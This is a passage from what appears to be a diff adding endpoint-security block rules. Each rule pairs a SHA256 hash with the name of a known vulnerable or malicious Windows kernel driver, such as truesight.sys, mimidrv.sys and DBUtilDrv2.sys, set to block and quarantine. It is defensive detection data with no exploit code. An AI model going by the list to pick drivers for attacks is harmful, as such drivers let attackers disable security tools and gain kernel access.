+ "last_update": "2026-03-23T11:45:31.813374Z",
+ "creation_date": "2026-03-23T11:45:31.813377Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813386Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa2848cf2cd9f9b241c73ba092460777573828c50eaafed6983f1c5d62edba84",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ceb8874-4fc4-51f5-9255-3f75fedb782b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981890Z",
+ "creation_date": "2026-03-23T11:45:29.981892Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "129fa1795cffca9973f59df59f880a9f2bdb3aa9873363f8e2f598ccc6e32542",
+ "comment": "Vulnerable Kernel Driver (aka DirectIo.sys) [https://www.loldrivers.io/drivers/ce2d41fd-908f-414c-b6b5-338298f425b8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ceba656-7adf-5d40-8f6b-b98757cf91bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147077Z",
+ "creation_date": "2026-03-23T11:45:31.147079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147084Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7906e164394dcbf1e06cc8001a5f1ddd6c479029e37c65ff5636796be1fac135",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3cfc893a-a638-5270-bd66-ed199be912da",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821757Z",
+ "creation_date": "2026-03-23T11:45:30.821760Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821769Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3f3684a37b2645fa6827943d9812ffc2d83e89e962935b29874bec7c3714a06f",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3d02f2ea-81af-596c-be07-750c5d09c798",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495818Z",
+ "creation_date": "2026-03-23T11:45:31.495820Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495825Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5df98d47f1c72157d3cac0a499296e2e5b741f5aed7aca9134e1952a39dbb55a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3d0af958-0118-59a2-bc4a-dc1535b48e0c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820106Z",
+ "creation_date": "2026-03-23T11:45:30.820108Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820113Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "717242ad6a3afb6f236890caa44501a4be8d0ab019f028ba2c74d3455f065804",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3d0dea25-74ee-567c-8db2-be53fe771af9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974644Z",
+ "creation_date": "2026-03-23T11:45:29.974646Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974652Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af45d91fefd4dfffda0ce70957a542b68775368432e52d20dfdf0fc159495c7f",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3d0f4486-53c2-5f01-9083-611db0bd78e8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478802Z",
+ "creation_date": "2026-03-23T11:45:31.478805Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478815Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6981813c6d68c56fcb1366a57dd34a2f73c365043dcc7d64efb51db3fcff7147",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3d367f93-5778-50ad-83e8-f6ae9e3f1afd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615203Z",
+ "creation_date": "2026-03-23T11:45:29.615205Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615210Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "745273e1620bc657d2210ae1b5abb49f4f5928829f95c8ef01ce151bdbb4c32f",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3d3699b0-31c0-5840-a3f7-e6e7406dc53c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967826Z",
+ "creation_date": "2026-03-23T11:45:29.967830Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967838Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74b432289de1302c53356b92ebebc0ac92e8159ab7746444e1ac85f7e90cd28e",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3d38e0f2-c4b2-5389-8a4a-32303f611b71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488845Z",
+ "creation_date": "2026-03-23T11:45:31.488847Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488853Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "02ac34d10a3e72c1fec7ebce30cd20db595bf45efe7e8cde888d2dcfc56dca9a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3d3b0db9-7403-5a3b-abce-6c10bdad3f64",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620745Z",
+ "creation_date": "2026-03-23T11:45:29.620747Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620752Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac3f613d457fc4d44fa27b2e0b1baa62c09415705efb5a40a4756da39b3ac165",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3d50a747-b61a-59be-a6d4-17147b52a401",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468461Z",
+ "creation_date": "2026-03-23T11:45:30.468464Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468472Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "edf05640ad7caa10756cc4163e926de74157da1d81b4d245b602a36f4c8cb4d0",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3d61eae8-4969-59fd-8ba2-f3eb89410789",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453431Z",
+ "creation_date": "2026-03-23T11:45:30.453435Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453444Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c4f56281d762bfaeb2168c13f3349611c8e3443602d2015540a742d6e79e6bc",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3d679b27-70a2-5176-8a0b-1e178d0087a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491706Z",
+ "creation_date": "2026-03-23T11:45:31.491709Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491719Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a33b8de796951d3140ce8441be03c748fad27efb1eed5ececd9ce5cc1c9d38c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3d91cf19-1299-5782-9365-96483f8bbc75",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480493Z",
+ "creation_date": "2026-03-23T11:45:31.480497Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480507Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ecec4fe9e9cbc648b7fb4ebec945268f5f1e2a73cf07efb3c29d67c4fe685a2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3d978851-0b46-5ed2-9399-d8641158f61b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480064Z",
+ "creation_date": "2026-03-23T11:45:30.480066Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480071Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "68105d0f74ab436d36a741095d9ac08b8316e926727d59f3fe874395b291615c",
+ "comment": "Vulnerable Kernel Driver (aka iscflashx64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3d983f17-85c1-5f33-aaae-e0fa398f14af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159457Z",
+ "creation_date": "2026-03-23T11:45:31.159458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d59246ccbe367e762c60a6dc64ccbca2afed2e3d48339dd461c8736c643a521",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3dbe74ce-1467-51e2-8144-6ed163467f23",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816155Z",
+ "creation_date": "2026-03-23T11:45:30.816157Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816163Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ad8c38f6e0ca6c93abe3228c8a5d4299430ce0a2eeb80c914326c75ba8a33f9",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3dc19227-8e27-5bc3-ac0c-f517ef56d5b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983229Z",
+ "creation_date": "2026-03-23T11:45:29.983231Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983236Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009",
+ "comment": "Vulnerable Kernel Driver (aka DBUtilDrv2.sys) [https://www.loldrivers.io/drivers/bb808089-5857-4df2-8998-753a7106cb44/,https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3dc4b816-2c71-5a94-b3b3-d2158adac29b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822980Z",
+ "creation_date": "2026-03-23T11:45:30.822982Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822987Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a0dbcf82dc346a49a816b3a6283392c9f2531661e460072ba063be898e5cbda0",
+ "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3dcacc0c-d480-55a3-9be8-e54d40288aa9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144075Z",
+ "creation_date": "2026-03-23T11:45:32.144077Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144082Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2cd7a0c4e8d24404c92e4ed8539b2136028a8ca663f3432e417b00665493e13f",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3dcc9676-b2d7-5d49-a9d7-1a62bf86854c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606865Z",
+ "creation_date": "2026-03-23T11:45:29.606867Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606889Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
